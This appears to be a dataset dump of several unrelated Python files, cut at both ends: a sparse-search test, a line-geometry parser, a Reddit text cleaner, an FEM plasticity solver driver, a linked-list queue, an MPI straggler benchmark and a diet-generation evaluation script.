\"\", \"e\", \"\"], \"f\"), None),\n (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", \"\", \"e\", \"\"], \"a\"), 0),\n]\n\ntestable_functions = [sparse_search, sparse_search_hh]\n\n\ndef test_sorted_search():\n for function in testable_functions:\n for (n, m), expected in test_cases:\n calculated = function(n, m)\n error_msg = f\"{function.__name__}: {calculated} != {expected}\"\n assert function(n, m) == expected, error_msg\n\n\nif __name__ == \"__main__\":\n test_sorted_search()\n","sub_path":"chapter_10/p05_sparse_search.py","file_name":"p05_sparse_search.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246603626","text":"import re\nfrom coordinate_finder import getdict\ndef make_line(strn, dicti={}):\n reglen=r\"([-+]?\\d+) *?cm\"\n mtiter=re.finditer(reglen, strn)\n leng=0\n for tr in mtiter:\n leng=float(tr.group(1))\n break\n regpt=r\"([A-Z]).*?\"\n matchiter_pts=re.finditer(regpt, strn)\n ptcrd=[]\n key = dicti.keys()\n for pt in matchiter_pts:\n if(pt.group(1) in key):\n ptcrd.append(dicti[pt.group(1)])\n if(len(ptcrd)==2):\n return (ptcrd[0], ptcrd[1], 0)\n if(len(ptcrd)==1):\n return (ptcrd[0], (0, 0), leng)\n if(len(ptcrd)==0):\n return ((0, 0), (0, 0), leng)\n# strn = \"draw a line conecting points A with co-ordinates (90,90) and (30,50) of length 230 cm\"\n# strn=\"draw a line AB of length 10 cm\"\n# dicti=getdict(strn, {})\n# print(make_line(strn, dicti))","sub_path":"Old Versions/v3.0-express/Backend/divided_scripts/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397630839","text":"#Script for formatting text\nimport os, sys, re, string, nltk, enchant\nfrom nltk.corpus import stopwords\n\n\ndef main():\n\n\tsub_list = []\n\twith open(\"subreddits.txt\") as subreddits:\n\t\tfor subreddit in subreddits:\n\t\t\tsub_list.append(subreddit.rstrip())\n\n\tonlyAlphabet = re.compile(r'[^a-z\\l+ \\']')\n\tstop = set(stopwords.words('english'))\n\td = enchant.Dict(\"en_US\")\n\tfoul_language = []\n\n\twith open(\"foul_language.txt\") as words:\n\t\tfor word in words:\n\t\t\tfoul_language.append(word.rstrip())\n\n\n\tdef cleanDoc(doc):\n\t\tstop_free = \" \".join([i for i in doc.lower().split() if i not in stop and i not in foul_language and d.check(i)])\n\t\tpunc_free = onlyAlphabet.sub('', stop_free)\n\t\treturn punc_free\n\n\n\tfor sub in sub_list:\n\t\ttxtlist_filename = sub + \"_textfiles.txt\"\n\t\ttxtlist_path = \"/home/kaislyn/RedditData/subreddits/%s/raw_text/\" % sub\t\t\t#Change path in this line\n\t\ttxtlist_filepath = os.path.join(txtlist_path, txtlist_filename)\n\t\t\n\t\toriginTextPath = \"/home/kaislyn/RedditData/subreddits/%s/raw_text/\" % sub\t\t#Change path in this line\n\t\tprocessedTextPath = \"/home/kaislyn/RedditData/subreddits/%s/processed_text/\" % sub\t#Change path in this line\n\n\n\t\tif not os.path.exists(processedTextPath):\n\t\t\tos.makedirs(processedTextPath)\n\t\n\t\twith open(txtlist_filepath) as posts:\n\t\t\tfor post in posts:\n\t\t\t\tdocs = []\n\n\t\t\t\tpostPath = os.path.join(originTextPath, post.rstrip())\n\t\t\t\tnewPath = os.path.join(processedTextPath, post.rstrip())\n\t\t\t\t\n\t\t\t\twith open(postPath) as txtfile:\n\t\t\t\t\tfor line in txtfile:\n\t\t\t\t\t\tdocs.append(line.rstrip())\n\n\t\t\t\tnfile = open(newPath, \"w+\")\n\t\t\t\tfor doc in docs:\n\t\t\t\t\tif len(cleanDoc(doc)) > 1:\n\t\t\t\t\t\tnfile.write(cleanDoc(doc) + \"\\n\")\n\t\t\t\tnfile.close()\n\t\t\t\t\n\t\t\t\t\n\t\n\n\n\nmain()\n","sub_path":"format_text.py","file_name":"format_text.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394476864","text":"\"\"\"Run\"\"\"\n\nimport os\nimport sys\nimport bmp\nimport prep\nimport tools\nimport solver\nimport postpro\nimport deformed\nimport gallery\nimport version\nimport prob\nimport copy\nimport plast\nimport gc\n\n#start timer\nTIME = tools.timer()\n\n#welcome message\nprint(\"\")\nprint(\"GRoT> ver. \" + version.get() + \", [Graficzny Rozwiązywacz Tarcz]\")\nprint(\"................................................\\n\")\n\n#read input file into list\nINP_FILE = open(\"input.txt\", \"r\")\nINP_FILE_LINES = INP_FILE.readlines()\n\nINP_LINES = []\n\n#create list of lines and words with no end line symbols\nfor i in range(len(INP_FILE_LINES)):\n INP_LINES.append(INP_FILE_LINES[i].rstrip().split(\" \"))\n\nINP_FILE.close()\n\ndef ksearch(keyword):\n for i in range(len(INP_LINES)):\n if (keyword in INP_LINES[i][0]) and (\"#\" not in INP_LINES[i][0]):\n return INP_LINES[i][1:]\n return [None]\n\nPROJ_NAME = ksearch(\"project\")[0]\n\nIMAGE = bmp.open_im(ksearch(\"bmp\")[0])\nGEOM = bmp.create_geom(IMAGE)\n\nNODES = GEOM[0]\nELES = GEOM[1].store()\nCONS = GEOM[2]\nBC_DICT = GEOM[3]\nPROB_DICT = GEOM[4]\n\nIMAGE, GEOM = None, None\n\nMAT = prep.materials(ELES)\nMAT.add(ksearch(\"mat\")[0])\nMAT.assignall(1)\nMAT.set_unit(ksearch(\"unit\")[0])\nMAT.set_scale(float(ksearch(\"scale\")[0]))\nSCALE = float(ksearch(\"scale\")[0])\n\nTHICKS = prep.thicks(ELES, MAT)\nTHICKS.add(float(ksearch(\"thickness\")[0]))\nTHICKS.assignall(1)\n\nloads_list = []\nfor i in range(len(INP_LINES)):\n if \"load\" in INP_LINES[i][0]:\n loads_list.append(i)\n\nfor i in range(len(loads_list)):\n CONS.load(BC_DICT[INP_LINES[loads_list[i]][5]],\n x=float(INP_LINES[loads_list[i]][2]),\n y=float(INP_LINES[loads_list[i]][4]))\n\nconstraints = CONS.store()\nCONS, BC_DICT = None, None\n\nSTATE = ksearch(\"problem\")[0]\nSOL = solver.Build(NODES, ELES, constraints, STATE, load_inc=1.0, scale=SCALE)\nNODES, constraints = None, None\n\nif not os.path.exists(\"results\" + os.sep + PROJ_NAME):\n os.makedirs(\"results\" + os.sep + PROJ_NAME)\n\nif ksearch(\"plast\")[0] != \"yes\":\n disp = SOL.direct()\n strains = SOL.strains_calc(disp)\n\nif ksearch(\"plast\")[0] == \"yes\":\n disp = SOL.direct_plast()\n disp_el = copy.copy(disp)\n strains = SOL.strains_calc(disp, msg=0)\n strains_el = copy.deepcopy(strains)\n iter_res = plast.Prepare(disp, strains, ELES)\n step_factor = iter_res.first_step(MAT)\n\nif (ksearch(\"plast\")[0] == \"yes\") and (step_factor < 1):\n load_step = step_factor\n steps_num = int(ksearch(\"plast\")[1])\n load_inc = (1 - step_factor) / (steps_num)\n flags_list = []\n eles_list = []\n sys.stdout.write(\"\\r\" + \"Nonlinear plasticity solver iteration [\" + str(1) + \\\n \" of \" + str(steps_num) + \"]\")\n sys.stdout.flush()\n\n file = open(\"results\" + os.sep + PROJ_NAME + os.sep + \"plast.txt\", \"w+\")\n file.write(\"meanRatio,\"+\"minRatio,\"+\"maxRatio,\"+\"newPLASTeles,\"+\"allPLASTeles,\"+\"plstrainACCUM,\"+\"plstrainSTEP\\n\")\n file.write(\"The ratio is a ratio of the calculated Huber stress to the yield stress for elements which have entered into plasticity\\n\")\n file.close()\n for i in range(steps_num):\n load_step += load_inc\n check_res = iter_res.out()\n # Runge Kutta 2nd order procedure\n SOL.plast_update([], load_inc / 2.0)\n disp = SOL.direct_plast()\n strains = SOL.strains_calc(disp, msg=0)\n halfstep_strains = iter_res.halfstep(strains)\n plast_res = plast.search(ELES, halfstep_strains, flags_list)\n\n eles_list = plast_res[0]\n flags_list = plast_res[1]\n stress2plast_list = plast_res[2] # for residuals check\n\n sys.stdout.write(\"\\r\" + \"Nonlinear plasticity solver iteration [\" + \\\n str(i + 1) + \" of \" + str(steps_num) + \"]\")\n sys.stdout.flush()\n\n STATE = ksearch(\"problem\")[0]\n SOL.plast_update(eles_list, load_inc)\n MAT.assignplast(eles_list)\n\n disp = SOL.direct_plast()\n strains = SOL.strains_calc(disp, msg=0)\n\n final_results = iter_res.store(MAT, disp, strains, flags_list)\n disp = final_results[0]\n strains = final_results[1]\n eff_pl_strains = final_results[2]\n eff_pl_strains_rate = final_results[3]\n\n # plast.txt file creation\n file = open(\"results\" + os.sep + PROJ_NAME + os.sep + \"plast.txt\", \"a\")\n s2plast_corrected = [] # to calculate actual ratio, not ratio in hafstep\n for val in stress2plast_list:\n val -= val * ((load_inc / 2.0) / (load_step - (load_inc / 2.0)))\n s2plast_corrected.append(val)\n if len(s2plast_corrected) == 0:\n s2plast_corrected.append(0)\n min_val = str(round(min(s2plast_corrected), 3))\n max_val = str(round(max(s2plast_corrected), 3))\n mean_val = str(round(sum(s2plast_corrected) / len(s2plast_corrected), 3))\n new_eles = str(len(eles_list))\n all_eles = str(len(flags_list))\n file.write(mean_val + \",\" + min_val + \",\" + max_val + \",\" + new_eles + \",\" + all_eles)\n file.write(\" \" + str(round(max(eff_pl_strains), 3)) + \",\" + str(round(max(eff_pl_strains_rate), 3)) + \"\\n\")\n file.close()\n print(\"\\nPlasticity analysis details [plast.txt] stored in results\" + os.sep + PROJ_NAME)\n print(\"\")\n # results storing\n check_res = iter_res.out()\n res_disp = iter_res.residual_disp(disp_el)\n res_strains = iter_res.residual_strains(strains_el)\n strains = iter_res.store_plstrain(strains)\n # print(\"\")\n\n disp_el, strains_el, iter_res, plast = None, None, None, None\n halfstep_strains, plast_res, final_results = None, None, None\ngc.collect()\n\ngallery_input_file = \"\"\n\nfor i in INP_FILE_LINES:\n if (i[0] != \"#\") and (len(i) != 1):\n gallery_input_file += \"\" + i + \"
\"\n\nprobe_color = ksearch(\"probe\")[0]\nif probe_color is not None:\n prob.write(probe_color, PROB_DICT, strains, PROJ_NAME, MAT)\n\nresults_list = []\ndesc_list = []\n\nres_d = ksearch(\"disp\")\nif res_d[0] is not None:\n post = postpro.Prepare(ELES, disp)\n\n for i in range(0, len(res_d)):\n sys.stdout.write(\"\\r\" + \"Plotted displacements results [\" + str(i + 1) + \\\n \" of \" + str(len(res_d)) + \"] to results\" + os.sep + PROJ_NAME + os.sep)\n sys.stdout.flush()\n res_name = post.save_dresults(res_d[i], PROJ_NAME)\n results_list.append(\"disp_\" + res_d[i] + \".png\")\n desc_list.append(res_name)\n post = None\n print(\"\")\n\nres_s = ksearch(\"stress\")\nif res_s[0] is not None:\n post2 = postpro.Prepare(ELES, strains)\n for i in range(0, len(res_s)):\n sys.stdout.write(\"\\r\" + \"Plotted stress and strains results [\" + str(i + 1) + \" of \" + \\\n str(len(res_s)) + \"] to results\" + os.sep + PROJ_NAME + os.sep)\n sys.stdout.flush()\n res_name = post2.save_sresults(res_s[i], PROJ_NAME)\n results_list.append(res_s[i] + \".png\")\n desc_list.append(res_name)\n print(\"\")\n\ndef_scale = ksearch(\"deformed\")[0]\nif def_scale is not None:\n post3 = deformed.Prepare(ELES, disp, float(def_scale))\n res_name = post3.save_deformed(\"deformed\", PROJ_NAME)\n results_list.append(\"deformed\" + \".png\")\n desc_list.append(res_name)\npost3 = None\ndisp = None\n\nif (ksearch(\"plast\")[0] == \"yes\") and (step_factor < 1):\n post4 = postpro.Prepare(ELES, res_disp)\n res_name = post4.save_dresults(\"res\", PROJ_NAME)\n results_list.append(\"disp_res.png\")\n desc_list.append(res_name)\n\n post4 = None\n post5 = postpro.Prepare(ELES, res_strains)\n res_name = post5.save_sresults(\"res_huber\", PROJ_NAME)\n results_list.append(\"res_huber\" + \".png\")\n desc_list.append(res_name)\n post5 = None\n res_name = post2.save_sresults(\"pl_strain\", PROJ_NAME)\n results_list.append(\"pl_strain\" + \".png\")\n desc_list.append(res_name)\n res_name = post2.save_sresults(\"h_stress\", PROJ_NAME)\n results_list.append(\"h_stress\" + \".png\")\n desc_list.append(res_name)\n post2 = None\n\n print(\"Results of plastic analysis stored in \" + \\\n \"results\" + os.sep + PROJ_NAME)\n\ngallery.save_gallery(PROJ_NAME, results_list, desc_list, gallery_input_file, version.get())\ngallery_path = \"results\" + os.sep + PROJ_NAME + os.sep + PROJ_NAME + \"_gallery.html\"\n\nprint(\"\")\nprint(\"Task finished in\", TIME.check())\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330788509","text":"class Nodo:\r\n \"\"\"Esta classe representa um nodo de uma estrutura duplamente encadeada.\"\"\"\r\n def __init__(self, dado=0, proximo_nodo=None):\r\n self.dado = dado\r\n self.proximo = proximo_nodo\r\n\r\n def __repr__(self):\r\n return '%s -> %s' % (self.dado, self.proximo)\r\nclass Fila:\r\n \"\"\"Esta classe representa uma fila usando uma estrutura encadeada.\"\"\"\r\n def __init__(self):\r\n self.primeiro = None\r\n self.ultimo = None\r\n def __repr__(self):\r\n return \"[\" + str(self.primeiro) + \"]\"\r\n def insere(self, novo_dado):\r\n \"\"\"Insere um elemento no final da fila.\"\"\"\r\n novo_nodo = Nodo(novo_dado)\r\n if self.primeiro == None:\r\n self.primeiro = novo_nodo\r\n self.ultimo = novo_nodo\r\n else:\r\n self.ultimo.proximo = novo_nodo\r\n self.ultimo = novo_nodo\r\n def remove(self):\r\n \"\"\"Remove o último elemento da fila.\"\"\"\r\n self.primeiro = self.primeiro.proximo\r\n\r\nfila = Fila()\r\nprint(\"Fila vazia: \", fila)\r\n\r\nwhile Fila != True:\r\n menu = int(input(\"Escolha um dos elementos a seguir:\\n[1] Adicionar elemento\\n[2] Remover elemnto\\n[3] Imprimir fila\\n[0] Sair\\nDigite aqui de acordo com o numero correspondente:\"))\r\n if menu == 1:\r\n var = int(input(\"digite um valor: \"))\r\n# Insere elementos na fila.\r\n fila.insere(var)\r\n print(\"Insere o valor {0} final da fila: {1}\".format(var, fila), \"\\n\")\r\n\r\n elif menu == 2:\r\n if fila.primeiro == None:\r\n fila = Fila()\r\n print(\"Fila vazia: \", fila, \"\\n\")\r\n else:\r\n# Remove elementos da fila.\r\n fila.remove()\r\n print(\"Removendo elemento que está no começo da fila: \", fila, \"\\n\")\r\n elif menu == 3:\r\n print(\"A fila: \",(fila), \"\\n\")\r\n\r\n elif menu == 0:\r\n print(\"Fim do programa\")\r\n exit()\r\n","sub_path":"fila.py","file_name":"fila.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364372474","text":"import numpy as np\nfrom mpi4py import MPI\nimport time\nimport random\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nstatus = MPI.Status()\nsize = 1000\nminiComp = 10\nnumberOfWorkers = 20\nnumberOfIter = 20\ntreshold = 7\nprevRecvCounter =0\nnumberOfComp = 3\npm = 0\nX = np.random.rand( int(size/miniComp),size) * np.sqrt(1) # row=300, column 3000 matrix for miniComps\ncounter = 0\nlastTagCounter= 0\ntsleep=0.0005\np=0.2\n\ndef sendCheck(iterIndex, req):\n if iterIndex ==1:\n return True\n else:\n return MPI.Request.Test(req)\n\nif rank == pm:\n ts = time.time()\n message = np.zeros(1)\n for i in range (1,numberOfIter+2):\n message[0] = i+1\n Y = np.empty([size, 1])\n if i == numberOfIter+1:\n tf = time.time()\n print(tf - ts)\n while(lastTagCounter < numberOfWorkers):\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag()==i:\n lastTagCounter += 1\n else:\n prevRecvCounter +=1\n else:\n while counter < treshold:\n comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == i:\n counter += 1\n else:\n prevRecvCounter +=1\n counter = 0\n if i % 2 == 0:\n for k in range(1, numberOfWorkers + 1):\n comm.Send(message, dest=k)\n else:\n for k in range(numberOfWorkers, 0, -1):\n comm.Send(message, dest=k)\n print (\"Prev recvs counter: \", prevRecvCounter)\n\nelse:\n message = np.zeros(1)\n Y=np.zeros((size,1))\n sendMult=np.zeros((size,1))\n flag=1\n sleepFlag=1\n iterIndex = 1\n multCounter = 0\n sendCounter = 0\n req = comm.Irecv(message, source=pm)\n req2 = None\n while iterIndex <= numberOfIter+1:\n if iterIndex == numberOfIter +1:\n comm.Send(Y, dest=pm, tag=iterIndex)\n iterIndex += 1\n else:\n if sleepFlag !=1 :\n if random.uniform(0, 1) < p:\n time.sleep(tsleep)\n sleepFlag = 1\n if MPI.Request.Test(req) and iterIndex <=numberOfIter and sleepFlag: # resets if message recv\n flag = 1\n iterIndex += 1\n counter = 0\n sendMult = np.zeros((size, 1))\n sleepFlag=0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n if (counter 1500\n endPoint = int((multCounter % miniComp + 1) * (size / miniComp)) # multCounter=15 ==> 1800\n Y[\n startPoint:endPoint] = miniMult # change the Y values between (1500-1800,1) with minimult(300,1)\n multCounter += 1\n if multCounter >= miniComp and multCounter % miniComp == 0:\n sendMult += Y\n counter += 1\n if MPI.Request.Test(req) and iterIndex <=numberOfIter and sleepFlag: # resets if message recv\n iterIndex += 1\n flag = 1\n counter = 0\n sendMult = np.zeros((size, 1))\n sleepFlag=0\n if iterIndex <= numberOfIter:\n req = comm.Irecv(message, source=pm)\n #print(\"message changed\")\n if counter == numberOfComp and flag and sleepFlag and sendCheck(iterIndex, req2):\n req2 = comm.Issend(sendMult, dest=pm, tag=iterIndex)\n #req2.wait()\n flag = 0\n","sub_path":"LCC.py","file_name":"LCC.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"515421708","text":"# %%\nimport sys\nsys.path.append(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code\")\nfrom Preprocessing import *\nfrom util import *\nfrom Model import *\nimport argparse\nparser = argparse.ArgumentParser(description='model, lr 입력')\nparser.add_argument('--num_epochs', type=int, required=True, help='num_epochs 입력')\nparser.add_argument('--lr', type=float, required=True, help='learning_rate 입력')\nargs = parser.parse_args()\n\n# %%\n'''\nTSNE Mapping\n'''\n\n## tsne map with generated diets 그리기 (복수의 방법론 비교)\nfrom os import listdir\nfrom os.path import isfile, join\ntarget_dir_list = [path + '/' + subdir for (path, dir, files) in os.walk('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code') for subdir in dir if \"tsne\" in subdir]\ntotal_nutrient_df = []\nmethod_label = []\nreward_dist_stack = np.empty([0, 13])\nnp.random.seed(None)\n\nfor cp_dir in target_dir_list:\n\n # 사전학습 모델을 활용하여 강화학습\n # pretrain 폴더에서 특정 시점 체크포인트 복원하기\n # 변수 초기화를 위한 random seed로서의 input, hidden_state, concat_state 생성\n encoder = Encoder(len(food_dict), BATCH_SIZE)\n init_input = np.zeros([BATCH_SIZE, 1])\n init_hidden = encoder.initialize_hidden_state()\n init_output, _ = encoder(init_input, init_hidden)\n\n # Decoder to predict food sequence\n decoder = Decoder(len(food_dict))\n decoder(init_input, init_hidden, init_output)\n\n # (1-3) 체크포인트에 기록된 인스턴스 지정\n checkpoint = tf.train.Checkpoint(encoder = encoder, decoder = decoder)\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/SCST/pretraining_SCST\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/SCST/training_SCST_lr=0.001_epoch=100/0\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Baselines/MIXER/training_lr=0.001_epoch=1000\"))\n # checkpoint.restore(tf.train.latest_checkpoint(\"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/Proposed/training_lr=0.001_epoch=5000_eb=10_bs=10\"))\n checkpoint.restore(tf.train.latest_checkpoint(cp_dir))\n\n encoder = checkpoint.encoder\n decoder = checkpoint.decoder\n\n true_total_reward = 0\n gen_total_reward = 0\n # total_nutrient_df_real = pd.DataFrame()\n total_nutrient_df_gen = pd.DataFrame()\n\n for batch in range(len(list(tf_dataset))):\n x = list(tf_dataset)[batch]\n sample_input = x[:, :x.shape[1] - 1]\n sample_enc_hidden = encoder.initialize_hidden_state()\n\n # 두 인코더의 컨텍스트 벡터 각각 뽑아주기\n sample_enc_output, sample_enc_hidden = encoder(sample_input, sample_enc_hidden)\n\n # 두 인코더의 컨텍스트 벡터 연결해주기\n sample_dec_hidden = copy.deepcopy(sample_enc_hidden)\n\n sample_seqs = np.empty((0, 1))\n sample_seqs = np.concatenate([sample_seqs, tf.reshape(sample_input[:, 0], shape = (-1, 1))])\n\n for j in range(15):\n sample_outputs, sample_dec_hidden, attention_weigths = decoder(sample_input[:, j], sample_dec_hidden, sample_enc_output)\n results = np.apply_along_axis(get_action, axis = 1, arr = sample_outputs, option = 'prob')\n next_token = tf.reshape(results[:, 0], shape = (-1, 1))\n sample_seqs = np.concatenate([sample_seqs, next_token], axis = 1)\n\n generated_file_name = \"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/\" + cp_dir.split('_')[-2] + \"_data_np.csv\"\n pd.DataFrame(sample_seqs).to_csv(generated_file_name)\n\n # 실제 식단과 생성 식단의 영양상태를 저장하여 t-sne 맵 만들기\n nutrient_real = np.apply_along_axis(get_score_vector, axis = 1, arr = np.array(x), nutrient_data = nutrient_data)\n nutrient_gen = np.apply_along_axis(get_score_vector, axis = 1, arr = sample_seqs, nutrient_data = nutrient_data)\n\n # total_nutrient_df_real = total_nutrient_df_real.append(pd.DataFrame(nutrient_real))\n total_nutrient_df_gen = total_nutrient_df_gen.append(pd.DataFrame(nutrient_gen))\n\n print(' ')\n print(' 정답 :', sequence_to_sentence(np.array(x), food_dict)[0])\n print(' 생성 :', sequence_to_sentence(sample_seqs, food_dict)[0])\n\n generated_file_name = \"/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/\" + cp_dir.split('_')[-2] + \"_result.csv\"\n pd.DataFrame(sequence_to_sentence(sample_seqs, food_dict)).to_csv(generated_file_name, encoding = 'utf-8-sig')\n\n true_reward = get_reward_ver2(get_score_vector(x[0], nutrient_data), 0)[0]\n gen_reward = get_reward_ver2(get_score_vector(sample_seqs[0], nutrient_data), 0)[0]\n print(' ')\n print(' 정답의 보상 :', true_reward)\n print(' 생성의 보상 :', gen_reward)\n\n mean_true_reward = np.mean(np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_real, done = 0)[:, 0])\n mean_gen_reward = np.mean(np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_gen, done = 0)[:, 0])\n\n # 배치가 여러개 일 때 누적\n true_total_reward += mean_true_reward\n gen_total_reward += mean_gen_reward\n\n # 생성식단들의 reward\n reward_dist = np.apply_along_axis(get_reward_ver2, axis = 1, arr = nutrient_gen, done = 0)[:, 2].sum(axis = 0).reshape(1, -1)\n reward_dist_stack = np.append(reward_dist_stack, reward_dist, axis = 0)\n\n true_mean_reward = true_total_reward / len(list(tf_dataset))\n gen_mean_reward = gen_total_reward / len(list(tf_dataset))\n\n print('true_mean_reward :', true_mean_reward)\n print('gen_mean_reward :', gen_mean_reward)\n\n total_nutrient_df, method = make_matrix_for_tsne(total_nutrient_df_gen)\n\n# tsne 매핑 결과 보기\ntotal_nutrient_df_real = pd.DataFrame(nutrient_real)\ntsne_matrix = tsne_mapping_multiple_gen(total_nutrient_df_real, total_nutrient_df)\ntsne_plot(tsne_matrix, method)\n\n# %%\n'''\nHit rate 점수 책정\n'''\nfirst_element = np.where(np.array(list(food_dict.values())) == \"시작\")[0][0]\nlast_element = np.where(np.array(list(food_dict.values())) == \"종료\")[0][0]\n\n# 1) 실제\n# meal_hit_score(diet_data_np.astype('int'), category_data)\n# dish_hit_score(diet_data_np.astype('int'), category_data)\navg_real_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = diet_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_real_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = diet_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 2) MIP\n# MIP_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/julia_result.csv', index_col = 0)\nMIP_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/available_julia.csv', index_col = 0)\nMIP_data_np = food_to_token(MIP_result, nutrient_data)\nfirst_column = np.repeat(first_element, MIP_data_np.shape[0]).reshape(-1, 1)\nlast_column = np.repeat(last_element, MIP_data_np.shape[0]).reshape(-1, 1)\nMIP_data_np = np.hstack([first_column, MIP_data_np, last_column])\n\n# meal_hit_score(MIP_data_np.astype('int'), category_data)\n# dish_hit_score(MIP_data_np.astype('int'), category_data)\navg_MIP_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = MIP_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_MIP_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = MIP_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 3) SCST\nSCST_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/SCST_data_np.csv', index_col = 0)\nSCST_data_np = np.array(SCST_result)\n\n# SCST_data_np = food_to_token(SCST_result, nutrient_data)\n# first_column = np.repeat(first_element, SCST_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, SCST_data_np.shape[0]).reshape(-1, 1)\n# SCST_data_np = np.hstack([first_column, SCST_data_np, last_column])\n\n# meal_hit_score(SCST_data_np.astype('int'), category_data)\n# dish_hit_score(SCST_data_np.astype('int'), category_data)\navg_SCST_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = SCST_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_SCST_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = SCST_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 4) MIXER\nMIXER_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/MIXER_data_np.csv', index_col = 0)\nMIXER_data_np = np.array(MIXER_result)\n\n# MIXER_data_np = food_to_token(MIXER_result, nutrient_data)\n# first_column = np.repeat(first_element, MIXER_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, MIXER_data_np.shape[0]).reshape(-1, 1)\n# MIXER_data_np = np.hstack([first_column, MIXER_data_np, last_column])\n\n# meal_hit_score(MIXER_data_np.astype('int'), category_data)\n# dish_hit_score(MIXER_data_np.astype('int'), category_data)\navg_MIXER_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = MIXER_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_MIXER_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = MIXER_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# 5) TFR\nTFR_result = pd.read_csv('/home/messy92/Leo/Controlled_Sequence_Generation/Diet_Generation/Code/results/TFR_data_np.csv', index_col = 0)\nTFR_data_np = np.array(TFR_result)\n\n# TFR_data_np = food_to_token(TFR_result, nutrient_data)\n# first_column = np.repeat(first_element, TFR_data_np.shape[0]).reshape(-1, 1)\n# last_column = np.repeat(last_element, TFR_data_np.shape[0]).reshape(-1, 1)\n# TFR_data_np = np.hstack([first_column, TFR_data_np, last_column])\n\n# meal_hit_score(TFR_data_np.astype('int'), category_data)\n# dish_hit_score(TFR_data_np.astype('int'), category_data)\navg_TFR_meal_hit = np.stack(np.apply_along_axis(meal_hit_score, axis = 1, arr = TFR_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\navg_TFR_dish_hit = np.stack(np.apply_along_axis(dish_hit_score, axis = 1, arr = TFR_data_np.astype('int'), category_data = category_data)[:, 0], axis = 0).mean()\n\n# %%\n'''\nRDI score 점수 책정\n'''\nreal_score = np.apply_along_axis(get_score_vector, arr = diet_data_np, axis = 1, nutrient_data = nutrient_data)\nreal_RDI_score = np.apply_along_axis(get_reward_ver2, arr = real_score, axis = 1, done = 0)[:, 0].mean()\n\n'''\n여기에서 MIP는 지금 보상이 잘못 계산되고 있음을 유념하라.\n>> 내가 작성한 보상을 계산하는 함수는 index 기반이라 nutrient_data['energy']가 아니라 nutrient_data.iloc(axis)[1] 와 같이 각 영양소를 조회함.\n>> 그러나 MIP로 생성한 식단은 순서가 지멋대로이므로 이렇게 index기반으로 계산할 시 잘못된 보상을 계산하게 됨.\n'''\nMIP_score = np.apply_along_axis(get_score_vector, arr = MIP_data_np, axis = 1, nutrient_data = nutrient_data)\nMIP_RDI_score = np.apply_along_axis(get_reward_ver2, arr = MIP_score, axis = 1, done = 0)[:, 0].mean()\n\nSCST_score = np.apply_along_axis(get_score_vector, arr = SCST_data_np, axis = 1, nutrient_data = nutrient_data)\nSCST_RDI_score = np.apply_along_axis(get_reward_ver2, arr = SCST_score, axis = 1, done = 0)[:, 